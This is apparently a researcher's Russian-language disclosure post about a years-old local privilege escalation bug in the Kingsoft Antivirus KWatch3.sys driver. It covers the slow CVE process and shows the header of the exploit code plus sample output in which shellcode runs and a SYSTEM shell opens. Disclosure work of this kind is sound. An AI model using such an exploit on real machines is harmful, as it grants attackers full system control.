
Эксплойт многолетней давности для локальной уязвимости повышения привилегий (EoP) в драйвере KWatch антивируса Kingsoft версии 2009.3.17.77.
Многолетний эксплойт локальной уязвимости повышения привилегий (EoP) в драйвере KWatch антивируса Kingsoft версии 2009.3.17.77.
Я сообщил об этой проблеме в январе 2014 года, а уведомление о CVE пришло более чем через 8 лет. Я решил выложить это, потому что найти свой старый код и осознать, что это заняло так много времени, довольно забавно.
Таким образом, это, скорее всего, не новая уязвимость, несмотря на новый CVE -- быстрый поиск показал, что уже есть несколько сообщений о той же самой уязвимости.
Я по-прежнему благодарю IPA за их работу и за то, что они сделали мой день.
По-видимому, уязвимым файлом является ffdedbaeccbcf0b697675b24ca313cbb8e1c9ba1bd2f0a0b58a2d6a04a038479
//
// Exploit for Kingsoft Antivirus KWatch Driver (KWatch3.sys)
// Target File Version: 2009.3.17.77
// Affected Product: Kingsoft Internet Security 9 Plus
//
/*
------------------------------------------------------------------------------
Shellcode is located at 7E7E7E7E.
The device was opened as 00000020.
Shellcode was executed.
The SYSTEM shell was launched.
This process will be suspended for ever.
------------------------------------------------------------------------------
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Users\user\Desktop>whoami
nt authority\system
------------------------------------------------------------------------------
*/